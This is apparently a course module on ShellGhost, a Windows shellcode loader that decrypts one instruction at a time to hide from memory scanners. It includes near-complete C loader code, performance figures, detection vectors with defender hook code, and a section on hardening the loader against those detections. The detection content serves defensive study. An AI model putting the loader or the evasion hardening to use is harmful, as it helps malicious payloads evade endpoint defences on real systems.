Difficulty: Advanced

Module 8: Full Chain, Performance & Detection

The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.

Module Objective

This final module consolidates everything into a complete end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors that defenders can use to identify ShellGhost, and compares it against alternative memory evasion techniques like sleep encryption and module stomping. You will leave this module with a complete understanding of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.

1. Complete Execution Flow

Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:

ShellGhost End-to-End Pipeline

1. Preprocess
mapping.py

→

2. Compile
Encrypted data + map

→

3. Alloc RW
Fill with 0xCC

→

4. Register VEH
First = 1

→

5. CreateThread
.text end entry

→

6. BP Loop
Per-instruction

→

7. Cleanup
Remove VEH, free

C// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>

// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;
    DWORD quota;
} CRYPT_BYTES_QUOTA;

typedef NTSTATUS (WINAPI *_SystemFunction032)(
    PUNICODE_STRING, PUNICODE_STRING);

// ============ Global State ============
static struct {
    PBYTE exec_base;
    SIZE_T exec_size;
    PBYTE enc_sc;          // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size;
    CRYPT_BYTES_QUOTA *map;
    DWORD num_instr;
    DWORD current_index;
    INT prev_index;
    BYTE key[16];
    USHORT key_len;
    _SystemFunction032 pSF032;
} G;

// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD r = ep->ExceptionRecord;
    PCONTEXT c = ep->ContextRecord;
    DWORD old;

    if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already adjusted by kernel (no -1 needed)
        PBYTE addr = (PBYTE)c->Rip;
        if (addr < G.exec_base ||
            addr >= G.exec_base + G.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_READWRITE, &old);

        // Re-encrypt previous instruction
        if (G.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
            memset(G.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
        memcpy(G.exec_base + curr->rva,
               G.enc_sc + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(G.exec_base + curr->rva) };
        UNICODE_STRING key = {
            G.key_len, G.key_len, (PWSTR)G.key };
        G.pSF032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_EXECUTE_READ, &old);

        G.prev_index = G.current_index;
        G.current_index++;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

// ============ Main ============
void ShellGhostRun(
    PBYTE enc_sc, SIZE_T sc_size,       // From mapping.py
    CRYPT_BYTES_QUOTA *map, DWORD n_instr,
    PBYTE key, USHORT key_len
) {
    // 1. Store references
    G.enc_sc = enc_sc;
    G.sc_size = sc_size;
    G.map = map;
    G.num_instr = n_instr;
    memcpy(G.key, key, key_len);
    G.key_len = key_len;
    G.prev_index = -1;
    G.current_index = 0;

    // 2. Resolve SystemFunction032
    G.pSF032 = (_SystemFunction032)GetProcAddress(
        LoadLibraryA("advapi32.dll"), "SystemFunction032");

    // 3. Allocate RW buffer filled with 0xCC
    G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(G.exec_base, 0xCC, sc_size);
    G.exec_size = sc_size;

    // 4. Register VEH handler
    PVOID h = AddVectoredExceptionHandler(1, Handler);

    // 5. Create thread at end of .text segment
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    RemoveVectoredExceptionHandler(h);
    VirtualFree(G.exec_base, 0, MEM_RELEASE);
}

2. Performance Impact Analysis

ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.

Exception Overhead Breakdown

Operation	Approximate Cost	Frequency
Kernel trap (INT3)	~1,000-5,000 cycles	Once per instruction
Context save to KTRAP_FRAME	~500-1,000 cycles	Once per instruction
User-mode dispatch (KiUserExceptionDispatcher)	~2,000-5,000 cycles	Once per instruction
VEH handler lookup + call	~100-500 cycles	Once per instruction
SystemFunction032 decrypt	~50-200 cycles	Once per instruction
VirtualProtect RW↔RX toggle	~1,000-3,000 cycles	Twice per instruction (RX→RW, then RW→RX)
Memory write (re-encrypt + decrypt)	~10-100 cycles	Once per instruction
NtContinue (restore CONTEXT)	~2,000-5,000 cycles	Once per instruction

Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles. A typical instruction executes in 1-5 cycles natively. This means ShellGhost imposes a slowdown factor of roughly 1,500x to 20,000x. Note that the one-exception model (breakpoint only, no single-step) is approximately half the exception overhead of a two-exception approach.

Practical Impact

Shellcode Type	Native Execution	ShellGhost Execution	Verdict
Stager (small, network setup)	<1 ms	~50-200 ms	Acceptable for a stager payload
Stageless beacon (~200KB)	~1 ms	~5-30 seconds for initial setup	Noticeable delay but usually tolerable
Continuous C2 loop	Real-time	Significant latency per iteration	ShellGhost is best for initialization, not continuous operation
Compute-heavy shellcode	Varies	Extremely slow	Not suitable for compute-bound payloads

Mitigation: Hybrid Approach

ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.

3. Detection Vectors

While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:

Detection Vector	Observable Indicator	Detection Method	Difficulty
VEH Registration	`AddVectoredExceptionHandler` API call	API hook, ETW Microsoft-Windows-Kernel-Audit-API-Calls provider	Easy
Excessive Exceptions	Thousands of EXCEPTION_BREAKPOINT per second	Performance counters, ETW exception events, kernel callbacks	Medium
RW/RX Memory Toggling	Frequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READ	API hook on VirtualProtect, ETW memory protection events	Medium
0xCC-Filled Memory	A memory region containing almost entirely 0xCC bytes	Heuristic scan for homogeneous INT3 regions	Medium
VEH Handler List Inspection	Non-standard VEH handlers registered in the process	Walking ntdll!LdrpVectorHandlerList	Medium
Thread Entry Point	Thread with entry point in the .text segment (at null bytes near the end)	Thread creation monitoring, unusual start address analysis	Hard
KiUserExceptionDispatcher Frequency	Extremely high rate of user-mode exception dispatch	Hooking KiUserExceptionDispatcher or monitoring debug events	Medium

4. Detection Deep Dive: VEH Registration Monitoring

C// Defender perspective: detecting VEH handler registration
// Method 1: Hook AddVectoredExceptionHandler
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;

PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
    // Log the registration
    LogEvent("VEH handler registered: First=%d, Handler=%p", First, Handler);

    // Check if the handler address is in a suspicious region
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQuery(Handler, &mbi, sizeof(mbi));
    if (mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
        AlertEvent("VEH handler in private memory (potential shellcode)");
    }

    return OriginalAddVEH(First, Handler);
}

// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList

5. Detection Deep Dive: Exception Rate Monitoring

C// Defender perspective: detecting excessive exception rates
// Using Windows Performance Counters or ETW

// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second

// ETW-based detection:
// Provider: Microsoft-Windows-Kernel-Audit-API-Calls
// Events: Exception dispatch events
// Threshold: Alert if > 1000 exceptions/second sustained

Exception Rate as an IoC

A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every single shellcode instruction. A typical shellcode payload might execute tens of thousands of instructions during initialization alone. This creates an exception rate that is orders of magnitude above normal, making it a strong Indicator of Compromise (IoC) for behavioral detection. Note that ShellGhost's one-exception model generates half the exceptions compared to a two-exception (breakpoint + single-step) approach, but this is still far above baseline.

6. Comparison with Other Memory Evasion Techniques

Technique	Decryption Surface	Performance	Detection Difficulty	Complexity
Sleep Encryption (Ekko)	Full payload during active phase	Minimal (native speed when active)	Medium (timer objects, VirtualProtect pattern)	Medium
Foliage	Full payload during active phase	Minimal (APC-based timer)	Medium (APC queue monitoring)	Medium-High
Module Stomping	Full payload (but appears backed by DLL)	Native speed	Medium (.text section hash mismatch)	Low-Medium
Page Guard Toggling	One page (4KB)	Moderate (one exception per page)	Medium (VirtualProtect frequency)	Medium
ShellGhost	1 instruction (~1-15 bytes)	Very slow (1 exception + 2 VirtualProtect per instruction)	Medium (exception rate, VEH registration, RW/RX toggling)	High

When to Use ShellGhost

Ideal: When memory scanning is the primary detection concern and the shellcode is small (stagers, position-independent loaders)
Good: As an initialization mechanism that transitions to native execution after setup
Acceptable: When performance is not critical and stealth against memory forensics is paramount
Not ideal: For large payloads, compute-intensive operations, or environments with strong behavioral monitoring

7. Hardening ShellGhost

Several modifications can make ShellGhost more resistant to the detection vectors identified above:

Reducing Observable Indicators

Detection Vector	Hardening Approach
RW/RX toggling frequency	ShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead).
VEH registration	Use direct syscalls for NtAddVectoredExceptionHandler to bypass API hooks
0xCC-filled region	Fill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction.
Exception rate	Add artificial delays between instructions to reduce exception frequency (further reduces performance)
VEH list inspection	Encode the handler pointer manually using the same scheme as RtlEncodePointer

8. Course Summary

What You Have Learned

Module	Topic	Key Concept
1	Memory Scanner Evasion	Full decryption creates a detectable window; minimal decryption surface is the goal
2	Software Breakpoints	INT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003)
3	Vectored Exception Handling	VEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority
4	The ShellGhost Concept	One-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one
5	SystemFunction032 & Shellcode Mapping	Python preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4
6	VEH Handler Implementation	ContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect
7	Background: Trap Flag & Single-Stepping	General x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost)
8	Full Chain & Detection	~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling

The Core Innovation

ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that makes shellcode effectively invisible to memory scanners while avoiding common IoCs like RWX memory and thread entry in private memory. This trade-off is compelling for scenarios where stealth matters more than performance — particularly for initial-stage execution.

Knowledge Check

Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?

A) 2-5x slower

B) 10-100x slower

C) 1,500-20,000x slower (due to kernel transition + VirtualProtect per instruction)

D) No measurable difference

Q2: Which detection vector is most straightforward for defenders to monitor?

A) RC4 keystream bias analysis

B) AddVectoredExceptionHandler API call combined with high EXCEPTION_BREAKPOINT rate

C) Scanning for 0xCC bytes in all memory regions

D) Monitoring CPU temperature for exception overhead

Q3: What is the recommended use case for ShellGhost in a real operation?

A) As a stager or initialization mechanism that transitions to native execution after setup

B) For continuous C2 beacon communication

C) For compute-intensive post-exploitation tasks

D) As a replacement for all shellcode loaders

← Prev: Background: Trap Flag & Single-Stepping Back to Course Home →